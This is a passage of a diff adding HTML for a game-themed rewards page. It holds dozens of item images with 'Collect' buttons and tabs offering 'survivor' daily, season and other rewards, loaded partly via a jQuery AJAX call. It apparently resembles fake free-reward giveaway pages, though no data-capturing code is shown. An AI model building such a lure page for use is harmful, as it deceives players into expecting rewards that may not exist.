     116 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171645-e62b5180-3e4b-11eb-94f3-098c27eba556.png">Collect</button>
     117 +</div>
     118 +<div class="item tengah">
     119 +<img src="https://user-images.githubusercontent.com/49580304/102171712-0c50f180-3e4c-11eb-935a-fb8c5e109758.jpg">
     120 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171712-0c50f180-3e4c-11eb-935a-fb8c5e109758.jpg">Collect</button>
     121 +</div>
     122 +<div class="item kanan">
     123 +<img src="https://user-images.githubusercontent.com/49580304/102171745-18d54a00-3e4c-11eb-82f4-41e1fda7fb7d.png">
     124 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171745-18d54a00-3e4c-11eb-82f4-41e1fda7fb7d.png">Collect</button>
     125 +</div>
     126 +<div class="item kiri">
     127 +<img src="https://user-images.githubusercontent.com/49580304/102171769-225eb200-3e4c-11eb-94de-86e205705194.png">
     128 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171769-225eb200-3e4c-11eb-94de-86e205705194.png">Collect</button>
     129 +</div>
     130 +<div class="item tengah">
     131 +<img src="https://user-images.githubusercontent.com/49580304/102171788-2db1dd80-3e4c-11eb-95cf-ccfa0a3474ff.png">
     132 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171788-2db1dd80-3e4c-11eb-95cf-ccfa0a3474ff.png">Collect</button>
     133 +</div>
     134 +<div class="item kanan">
     135 +<img src="https://user-images.githubusercontent.com/49580304/102171829-49b57f00-3e4c-11eb-8668-8f32c2c779a5.png">
     136 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171829-49b57f00-3e4c-11eb-8668-8f32c2c779a5.png">Collect</button>
     137 +</div>
     138 +<div class="item kiri">
     139 +<img src="https://user-images.githubusercontent.com/49580304/102171846-576b0480-3e4c-11eb-877b-dd3121cde912.png">
     140 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171846-576b0480-3e4c-11eb-877b-dd3121cde912.png">Collect</button>
     141 +</div>
     142 +<div class="item tengah">
     143 +<img src="https://user-images.githubusercontent.com/49580304/102171865-6651b700-3e4c-11eb-817d-0e2ed4ad59dc.png">
     144 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171865-6651b700-3e4c-11eb-817d-0e2ed4ad59dc.png">Collect</button>
     145 +</div>
     146 +<div class="item kanan">
     147 +<img src="https://user-images.githubusercontent.com/49580304/102171903-7cf80e00-3e4c-11eb-9596-6f79a02bdca3.png">
     148 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171903-7cf80e00-3e4c-11eb-9596-6f79a02bdca3.png">Collect</button>
     149 +</div>
     150 +<div class="item kiri">
     151 +<img src="https://user-images.githubusercontent.com/49580304/102171926-8bdec080-3e4c-11eb-8ef8-3c2d56c96f72.png">
     152 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171926-8bdec080-3e4c-11eb-8ef8-3c2d56c96f72.png">Collect</button>
     153 +</div>
     154 +<div class="item tengah">
     155 +<img src="https://user-images.githubusercontent.com/49580304/102171951-9e58fa00-3e4c-11eb-9edf-2affce6a55f5.png">
     156 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171951-9e58fa00-3e4c-11eb-9edf-2affce6a55f5.png">Collect</button>
     157 +</div>
     158 +<div class="item kanan">
     159 +<img src="https://user-images.githubusercontent.com/49580304/102171972-add84300-3e4c-11eb-836f-f468d647282e.png">
     160 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171972-add84300-3e4c-11eb-836f-f468d647282e.png">Collect</button>
     161 +</div>
     162 +<div class="item kiri">
     163 +<img src="https://user-images.githubusercontent.com/49580304/102171989-ba5c9b80-3e4c-11eb-8f7e-a95b56e87957.jpg">
     164 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102171989-ba5c9b80-3e4c-11eb-8f7e-a95b56e87957.jpg">Collect</button>
     165 +</div>
     166 +<div class="item tengah">
     167 +<img src="https://user-images.githubusercontent.com/49580304/102172021-d3654c80-3e4c-11eb-9ad5-17ca9c7cc6cd.png">
     168 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172021-d3654c80-3e4c-11eb-9ad5-17ca9c7cc6cd.png">Collect</button>
     169 +</div>
     170 +<div class="item kanan">
     171 +<img src="https://user-images.githubusercontent.com/49580304/102172048-e1b36880-3e4c-11eb-937f-f6f16ab657f3.jpg">
     172 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172048-e1b36880-3e4c-11eb-937f-f6f16ab657f3.jpg">Collect</button>
     173 +</div>
     174 +<div class="item kiri">
     175 +<img src="https://user-images.githubusercontent.com/49580304/102172072-ed9f2a80-3e4c-11eb-9b2d-d04888fe1d8c.jpg">
     176 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172072-ed9f2a80-3e4c-11eb-9b2d-d04888fe1d8c.jpg">Collect</button>
     177 +</div>
     178 +<div class="item tengah">
     179 +<img src="https://user-images.githubusercontent.com/49580304/102172094-fabc1980-3e4c-11eb-98f1-6bfe9d571b7a.png">
     180 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172094-fabc1980-3e4c-11eb-98f1-6bfe9d571b7a.png">Collect</button>
     181 +</div>
     182 +<div class="item kanan">
     183 +<img src="https://user-images.githubusercontent.com/49580304/102172133-0ad3f900-3e4d-11eb-86e3-1b17a2f973f3.png">
     184 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172133-0ad3f900-3e4d-11eb-86e3-1b17a2f973f3.png">Collect</button>
     185 +</div>
     186 +<div class="item kiri">
     187 +<img src="https://user-images.githubusercontent.com/49580304/102172155-145d6100-3e4d-11eb-8c8c-3b755443e58a.png">
     188 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172155-145d6100-3e4d-11eb-8c8c-3b755443e58a.png">Collect</button>
     189 +</div>
     190 +<div class="item tengah">
     191 +<img src="https://user-images.githubusercontent.com/49580304/102172179-20492300-3e4d-11eb-9747-6f67353a69fd.png">
     192 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172179-20492300-3e4d-11eb-9747-6f67353a69fd.png">Collect</button>
     193 +</div>
     194 +<div class="item kanan">
     195 +<img src="https://user-images.githubusercontent.com/49580304/102172203-2e973f00-3e4d-11eb-8867-92bc1f48fa77.png">
     196 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172203-2e973f00-3e4d-11eb-8867-92bc1f48fa77.png">Collect</button>
     197 +</div>
     198 +<div class="item kiri">
     199 +<img src="https://user-images.githubusercontent.com/49580304/102172236-41aa0f00-3e4d-11eb-8e93-e68ba3f31bbe.png">
     200 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172236-41aa0f00-3e4d-11eb-8e93-e68ba3f31bbe.png">Collect</button>
     201 +</div>
     202 +<div class="item tengah">
     203 +<img src="https://user-images.githubusercontent.com/49580304/102172273-52f31b80-3e4d-11eb-9cd4-8d7bb6514b0a.png">
     204 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172273-52f31b80-3e4d-11eb-9cd4-8d7bb6514b0a.png">Collect</button>
     205 +</div>
     206 +<div class="item kanan">
     207 +<img src="https://user-images.githubusercontent.com/49580304/102172296-5be3ed00-3e4d-11eb-892e-0ebd09645e9a.png">
     208 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172296-5be3ed00-3e4d-11eb-892e-0ebd09645e9a.png">Collect</button>
     209 +</div>
     210 +<div class="item kiri">
     211 +<img src="https://user-images.githubusercontent.com/49580304/102172320-67cfaf00-3e4d-11eb-97c6-b3763732d0b2.png">
     212 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172320-67cfaf00-3e4d-11eb-97c6-b3763732d0b2.png">Collect</button>
     213 +</div>
     214 +<div class="item tengah">
     215 +<img src="https://user-images.githubusercontent.com/49580304/102172357-74ec9e00-3e4d-11eb-87d1-98cf02f375c4.png">
     216 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172357-74ec9e00-3e4d-11eb-87d1-98cf02f375c4.png">Collect</button>
     217 +</div>
     218 +<div class="item kanan">
     219 +<img src="https://user-images.githubusercontent.com/49580304/102172389-82098d00-3e4d-11eb-98c5-201a5963cf38.png">
     220 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172389-82098d00-3e4d-11eb-98c5-201a5963cf38.png">Collect</button>
     221 +</div>
     222 +<div class="item kiri">
     223 +<img src="https://user-images.githubusercontent.com/49580304/102172469-acf3e100-3e4d-11eb-9932-3a842b4bbe66.png">
     224 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172469-acf3e100-3e4d-11eb-9932-3a842b4bbe66.png">Collect</button>
     225 +</div>
     226 +<div class="item tengah">
     227 +<img src="https://user-images.githubusercontent.com/49580304/102172493-bb41fd00-3e4d-11eb-83ff-1e274f721fb2.png">
     228 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172493-bb41fd00-3e4d-11eb-83ff-1e274f721fb2.png">Collect</button>
     229 +</div>
     230 +<div class="item kanan">
     231 +<img src="https://user-images.githubusercontent.com/49580304/102178437-40cbaa00-3e5a-11eb-9ed8-345bfa52aac0.png">
     232 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102178437-40cbaa00-3e5a-11eb-9ed8-345bfa52aac0.png">Collect</button>
     233 +</div>
     234 +<div class="item kiri">
     235 +<img src="https://user-images.githubusercontent.com/49580304/102172512-c5fc9200-3e4d-11eb-8edf-cc5d3edec393.png">
     236 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172512-c5fc9200-3e4d-11eb-8edf-cc5d3edec393.png">Collect</button>
     237 +</div>
     238 +<div class="item tengah">
     239 +<img src="https://user-images.githubusercontent.com/49580304/102172644-052ae300-3e4e-11eb-9881-f8da2f522ac5.png">
     240 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172644-052ae300-3e4e-11eb-9881-f8da2f522ac5.png">Collect</button>
     241 +</div>
     242 +<div class="item kanan">
     243 +<img src="https://user-images.githubusercontent.com/49580304/102172662-1116a500-3e4e-11eb-862e-1f4690a5be71.jpg">
     244 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172662-1116a500-3e4e-11eb-862e-1f4690a5be71.jpg">Collect</button>
     245 +</div>
     246 +<div class="item kiri">
     247 +<img src="https://user-images.githubusercontent.com/49580304/102172678-1aa00d00-3e4e-11eb-9fbc-710534cb7359.png">
     248 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172678-1aa00d00-3e4e-11eb-9fbc-710534cb7359.png">Collect</button>
     249 +</div>
     250 +<div class="item tengah">
     251 +<img src="https://user-images.githubusercontent.com/49580304/102172705-28559280-3e4e-11eb-8dc7-211157aa3b41.jpg">
     252 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172705-28559280-3e4e-11eb-8dc7-211157aa3b41.jpg">Collect</button>
     253 +</div>
     254 +<div class="item kanan">
     255 +<img src="https://user-images.githubusercontent.com/49580304/102172748-41f6da00-3e4e-11eb-9caf-7e2e9b5df811.png">
     256 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172748-41f6da00-3e4e-11eb-9caf-7e2e9b5df811.png">Collect</button>
     257 +</div>
     258 +<div class="item kiri">
     259 +<img src="https://user-images.githubusercontent.com/49580304/102172761-4de29c00-3e4e-11eb-8fbf-50af141a0437.png">
     260 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172761-4de29c00-3e4e-11eb-8fbf-50af141a0437.png">Collect</button>
     261 +</div>
     262 +<div class="item tengah">
     263 +<img src="https://user-images.githubusercontent.com/49580304/102172780-5935c780-3e4e-11eb-9c23-00fae07a1f48.png">
     264 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172780-5935c780-3e4e-11eb-9c23-00fae07a1f48.png">Collect</button>
     265 +</div>
     266 +<div class="item kanan">
     267 +<img src="https://user-images.githubusercontent.com/49580304/102172795-6357c600-3e4e-11eb-8e88-a4ff1b88dfe2.jpg">
     268 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172795-6357c600-3e4e-11eb-8e88-a4ff1b88dfe2.jpg">Collect</button>
     269 +</div>
     270 +<div class="item kiri">
     271 +<img src="https://user-images.githubusercontent.com/49580304/102172840-7cf90d80-3e4e-11eb-8771-d905763cf2cd.png">
     272 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172840-7cf90d80-3e4e-11eb-8771-d905763cf2cd.png">Collect</button>
     273 +</div>
     274 +<div class="item tengah">
     275 +<img src="https://user-images.githubusercontent.com/49580304/102172856-87b3a280-3e4e-11eb-97e9-ea8ad6b0f995.png">
     276 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172856-87b3a280-3e4e-11eb-97e9-ea8ad6b0f995.png">Collect</button>
     277 +</div>
     278 +<div class="item kanan">
     279 +<img src="https://user-images.githubusercontent.com/49580304/102172868-926e3780-3e4e-11eb-9cb0-12b4a81aff97.jpg">
     280 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172868-926e3780-3e4e-11eb-9cb0-12b4a81aff97.jpg">Collect</button>
     281 +</div>
     282 +<div class="item kiri">
     283 +<img src="https://user-images.githubusercontent.com/49580304/102172890-9ef29000-3e4e-11eb-9dfa-ee825237f215.jpg">
     284 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172890-9ef29000-3e4e-11eb-9dfa-ee825237f215.jpg">Collect</button>
     285 +</div>
     286 +<div class="item tengah">
     287 +<img src="https://user-images.githubusercontent.com/49580304/102172947-ca757a80-3e4e-11eb-9f3f-d28720089510.jpg">
     288 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172947-ca757a80-3e4e-11eb-9f3f-d28720089510.jpg">Collect</button>
     289 +</div>
     290 +<div class="item kanan">
     291 +<img src="https://user-images.githubusercontent.com/49580304/102172974-d5300f80-3e4e-11eb-80df-b6882a07ea89.png">
     292 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172974-d5300f80-3e4e-11eb-80df-b6882a07ea89.png">Collect</button>
     293 +</div>
     294 +<div class="item kiri">
     295 +<img src="https://user-images.githubusercontent.com/49580304/102172983-e0833b00-3e4e-11eb-94b7-1309f3b8389e.png">
     296 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102172983-e0833b00-3e4e-11eb-94b7-1309f3b8389e.png">Collect</button>
     297 +</div>
     298 +<div class="item tengah">
     299 +<img src="https://user-images.githubusercontent.com/49580304/102173000-ea0ca300-3e4e-11eb-992a-3232af1d463e.png">
     300 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102173000-ea0ca300-3e4e-11eb-992a-3232af1d463e.png">Collect</button>
     301 +</div>
     302 +<div class="item kanan">
     303 +<img src="https://user-images.githubusercontent.com/49580304/102173038-fdb80980-3e4e-11eb-82b6-0556f4a65658.png">
     304 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102173038-fdb80980-3e4e-11eb-82b6-0556f4a65658.png">Collect</button>
     305 +</div>
     306 +<div class="item kiri">
     307 +<img src="https://user-images.githubusercontent.com/49580304/102173048-06a8db00-3e4f-11eb-81ca-4059f96c6fb7.png">
     308 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102173048-06a8db00-3e4f-11eb-81ca-4059f96c6fb7.png">Collect</button>
     309 +</div>
     310 +<div class="item tengah">
     311 +<img src="https://user-images.githubusercontent.com/49580304/102173065-16c0ba80-3e4f-11eb-8a63-c2dacbfb7f3a.png">
     312 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102173065-16c0ba80-3e4f-11eb-8a63-c2dacbfb7f3a.png">Collect</button>
     313 +</div>
     314 +<div class="item kanan">
     315 +<img src="https://user-images.githubusercontent.com/49580304/102173088-217b4f80-3e4f-11eb-898a-1ee3fc271473.png">
     316 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102173088-217b4f80-3e4f-11eb-898a-1ee3fc271473.png">Collect</button>
     317 +</div>
     318 +<div class="item kiri">
     319 +<img src="https://user-images.githubusercontent.com/49580304/102175229-f5ae9880-3e53-11eb-9837-9e1b7f8504a5.png">
     320 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175229-f5ae9880-3e53-11eb-9837-9e1b7f8504a5.png">Collect</button>
     321 +</div>
     322 +<div class="item tengah">
     323 +<img src="https://user-images.githubusercontent.com/49580304/102175259-0a8b2c00-3e54-11eb-960a-a57302642d72.png">
     324 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175259-0a8b2c00-3e54-11eb-960a-a57302642d72.png">Collect</button>
     325 +</div>
     326 +<div class="item kanan">
     327 +<img src="https://user-images.githubusercontent.com/49580304/102175297-1d056580-3e54-11eb-8690-bf19d72d6655.jpg">
     328 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175297-1d056580-3e54-11eb-8690-bf19d72d6655.jpg">Collect</button>
     329 +</div>
     330 +<div class="item kiri">
     331 +<img src="https://user-images.githubusercontent.com/49580304/102175309-255da080-3e54-11eb-9360-50347bbf8a1c.jpg">
     332 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175309-255da080-3e54-11eb-9360-50347bbf8a1c.jpg">Collect</button>
     333 +</div>
     334 +<div class="item tengah">
     335 +<img src="https://user-images.githubusercontent.com/49580304/102175342-37d7da00-3e54-11eb-9036-73d85a603d0e.jpg">
     336 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175342-37d7da00-3e54-11eb-9036-73d85a603d0e.jpg">Collect</button>
     337 +</div>
     338 +<div class="item kanan">
     339 +<img src="https://user-images.githubusercontent.com/49580304/102175398-563dd580-3e54-11eb-8342-4885bb45f57a.png">
     340 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175398-563dd580-3e54-11eb-8342-4885bb45f57a.png">Collect</button>
     341 +</div>
     342 +<div class="item kiri">
     343 +<img src="https://user-images.githubusercontent.com/49580304/102175412-5f2ea700-3e54-11eb-87d7-fbb2d98c7c55.png">
     344 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175412-5f2ea700-3e54-11eb-87d7-fbb2d98c7c55.png">Collect</button>
     345 +</div>
     346 +<div class="item tengah">
     347 +<img src="https://user-images.githubusercontent.com/49580304/102175430-6b1a6900-3e54-11eb-850b-f6defe15db94.png">
     348 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175430-6b1a6900-3e54-11eb-850b-f6defe15db94.png">Collect</button>
     349 +</div>
     350 +<div class="item kanan">
     351 +<img src="https://user-images.githubusercontent.com/49580304/102175490-85544700-3e54-11eb-9236-94e49066c060.png">
     352 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175490-85544700-3e54-11eb-9236-94e49066c060.png">Collect</button>
     353 +</div>
     354 +<div class="item kiri">
     355 +<img src="https://user-images.githubusercontent.com/49580304/102175524-9309cc80-3e54-11eb-84fd-c9264ba64d32.png">
     356 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175524-9309cc80-3e54-11eb-84fd-c9264ba64d32.png">Collect</button>
     357 +</div>
     358 +<div class="item tengah">
     359 +<img src="https://user-images.githubusercontent.com/49580304/102175556-9f8e2500-3e54-11eb-9634-bd220ffdb071.png">
     360 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175556-9f8e2500-3e54-11eb-9634-bd220ffdb071.png">Collect</button>
     361 +</div>
     362 +<div class="item kanan">
     363 +<img src="https://user-images.githubusercontent.com/49580304/102175649-c3516b00-3e54-11eb-948f-79444233d27b.png">
     364 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175649-c3516b00-3e54-11eb-948f-79444233d27b.png">Collect</button>
     365 +</div>
     366 +<div class="item kiri">
     367 +<img src="https://user-images.githubusercontent.com/49580304/102175672-cd736980-3e54-11eb-91df-c4acd5f8715b.png">
     368 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175672-cd736980-3e54-11eb-91df-c4acd5f8715b.png">Collect</button>
     369 +</div>
     370 +<div class="item tengah">
     371 +<img src="https://user-images.githubusercontent.com/49580304/102175694-d6fcd180-3e54-11eb-8c22-76a4c3845167.png">
     372 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175694-d6fcd180-3e54-11eb-8c22-76a4c3845167.png">Collect</button>
     373 +</div>
     374 +<div class="item kanan">
     375 +<img src="https://user-images.githubusercontent.com/49580304/102175782-f693fa00-3e54-11eb-9a57-dc151ab7fbc8.png">
     376 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175782-f693fa00-3e54-11eb-9a57-dc151ab7fbc8.png">Collect</button>
     377 +</div>
     378 +<div class="item kiri">
     379 +<img src="https://user-images.githubusercontent.com/49580304/102175810-00b5f880-3e55-11eb-8177-3adbf27fc3d2.png">
     380 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175810-00b5f880-3e55-11eb-8177-3adbf27fc3d2.png">Collect</button>
     381 +</div>
     382 +<div class="item tengah">
     383 +<img src="https://user-images.githubusercontent.com/49580304/102175856-13c8c880-3e55-11eb-8427-8fc1a794c439.png">
     384 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175856-13c8c880-3e55-11eb-8427-8fc1a794c439.png">Collect</button>
     385 +</div>
     386 +<div class="item kanan">
     387 +<img src="https://user-images.githubusercontent.com/49580304/102175885-204d2100-3e55-11eb-9742-d46e7d62ca5c.png">
     388 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175885-204d2100-3e55-11eb-9742-d46e7d62ca5c.png">Collect</button>
     389 +</div>
     390 +<div class="item kiri">
     391 +<img src="https://user-images.githubusercontent.com/49580304/102175916-2c38e300-3e55-11eb-9c20-834181a1a1b4.png">
     392 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175916-2c38e300-3e55-11eb-9c20-834181a1a1b4.png">Collect</button>
     393 +</div>
     394 +<div class="item tengah">
     395 +<img src="https://user-images.githubusercontent.com/49580304/102175947-36f37800-3e55-11eb-9f56-69ce66304348.png">
     396 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102175947-36f37800-3e55-11eb-9f56-69ce66304348.png">Collect</button>
     397 +</div>
     398 +</div>
     399 +</div>
     400 +<div class="tab_rewards" id="season">
     401 +<div class="menu-notify">
     402 +<div class="menu-notify-icon"><i class="zmdi zmdi-info-outline"></i></div>
     403 +<div class="menu-notify-txt">Hi survivor, this is the season reward for you today</div>
     404 +</div>
     405 +<div class="scroll">
     406 +<div class="item kanan">
     407 +<img src="https://user-images.githubusercontent.com/49580304/102176906-3cea5880-3e57-11eb-8fa8-6fa393c70a2f.png">
     408 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176906-3cea5880-3e57-11eb-8fa8-6fa393c70a2f.png">Collect</button>
     409 +</div>
     410 +<div class="item kiri">
     411 +<img src="https://user-images.githubusercontent.com/49580304/102176907-3d82ef00-3e57-11eb-9694-f8a46e9e6993.png">
     412 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176907-3d82ef00-3e57-11eb-9694-f8a46e9e6993.png">Collect</button>
     413 +</div>
     414 +<div class="item tengah">
     415 +<img src="https://user-images.githubusercontent.com/49580304/102176908-3e1b8580-3e57-11eb-9807-aa69a3091434.png">
     416 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176908-3e1b8580-3e57-11eb-9807-aa69a3091434.png">Collect</button>
     417 +</div>
     418 +<div class="item kanan">
     419 +<img src="https://user-images.githubusercontent.com/49580304/102176909-3eb41c00-3e57-11eb-87f9-acf71898d00d.png">
     420 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176909-3eb41c00-3e57-11eb-87f9-acf71898d00d.png">Collect</button>
     421 +</div>
     422 +<div class="item kiri">
     423 +<img src="https://user-images.githubusercontent.com/49580304/102176910-3f4cb280-3e57-11eb-83e7-f8407dded1db.png">
     424 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176910-3f4cb280-3e57-11eb-83e7-f8407dded1db.png">Collect</button>
     425 +</div>
     426 +<div class="item tengah">
     427 +<img src="https://user-images.githubusercontent.com/49580304/102176873-31972d00-3e57-11eb-86d0-ade0e6fbf2cd.png">
     428 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176873-31972d00-3e57-11eb-86d0-ade0e6fbf2cd.png">Collect</button>
     429 +</div>
     430 +<div class="item kanan">
     431 +<img src="https://user-images.githubusercontent.com/49580304/102176874-3360f080-3e57-11eb-9ef9-55ab8f2be1ae.png">
     432 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176874-3360f080-3e57-11eb-9ef9-55ab8f2be1ae.png">Collect</button>
     433 +</div>
     434 +<div class="item kiri">
     435 +<img src="https://user-images.githubusercontent.com/49580304/102176877-33f98700-3e57-11eb-95c9-2cb536a85337.png">
     436 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102176877-33f98700-3e57-11eb-95c9-2cb536a85337.png">Collect</button>
     437 +</div>
     438 +</div>
     439 +</div>
     440 +<div class="tab_rewards" id="other">
     441 +<script type="text/javascript">
     442 +function buka(nama) {
     443 +$("#konten").html('<div class="load-item">Please wait...</div>');
     444 + $.ajax({
     445 + url : nama+'.php',
     446 + type : 'GET',
     447 + dataType: 'html',
     448 + success : function(isi){
     449 + $("#konten").html(isi);
     450 + },
     451 + });
     452 +}
     453 +</script>
     454 +<div id="konten">
     455 +<div class="menu-notify">
     456 +<a href="javascript:;" onclick="buka('pages/uc');"><div class="menu-notify-change">Change Reward</div></a>
     457 +<div class="menu-notify-icon"><i class="zmdi zmdi-info-outline"></i></div>
     458 +<div class="menu-notify-txt">Hi survivor, this is the other reward for you</div>
     459 +</div>
     460 +<div class="scroll">
     461 +<div class="item kanan">
     462 +<img src="https://user-images.githubusercontent.com/49580304/102177638-ce0dff00-3e58-11eb-9fed-15142caabde8.png">
     463 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177638-ce0dff00-3e58-11eb-9fed-15142caabde8.png">Collect</button>
     464 +</div>
     465 +<div class="item kiri">
     466 +<img src="https://user-images.githubusercontent.com/49580304/102177733-f990e980-3e58-11eb-861d-328f46e0e99a.png">
     467 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177733-f990e980-3e58-11eb-861d-328f46e0e99a.png">Collect</button>
     468 +</div>
     469 +<div class="item tengah">
     470 +<img src="https://user-images.githubusercontent.com/49580304/102177768-0ad9f600-3e59-11eb-9adb-98445bfe1719.png">
     471 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177768-0ad9f600-3e59-11eb-9adb-98445bfe1719.png">Collect</button>
     472 +</div>
     473 +<div class="item kanan">
     474 +<img src="https://user-images.githubusercontent.com/49580304/102177786-14fbf480-3e59-11eb-99d3-de9065c81956.png">
     475 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177786-14fbf480-3e59-11eb-99d3-de9065c81956.png">Collect</button>
     476 +</div>
     477 +<div class="item kiri">
     478 +<img src="https://user-images.githubusercontent.com/49580304/102177815-22b17a00-3e59-11eb-84d4-e90dd1b6d3e0.png">
     479 +<button type="button" onclick="open_reward_confirmation(this)" src="https://user-images.githubusercontent.com/49580304/102177815-22b17a00-3e59-11eb-84d4-e90dd1b6d3e0.png">Collect</button>
     480 +</div>
     481 +<div class="item tengah">
